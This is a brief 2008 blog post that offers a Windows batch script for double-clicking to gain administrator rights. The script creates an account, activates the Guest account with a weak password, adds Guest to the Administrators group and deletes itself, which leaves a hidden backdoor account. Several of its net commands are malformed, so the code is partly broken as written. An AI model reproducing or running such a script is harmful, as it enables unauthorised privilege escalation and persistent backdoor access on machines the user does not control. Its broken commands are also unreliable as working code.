try dis
copy and paste the code given below in notepad and save it as anyname.bat
den dbclick on it...this will add u in administrator group
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
This entry was posted
on Friday, June 20, 2008
at 10:23 AM
and is filed under
computers
. You can follow any responses to this entry through the
comments feed
.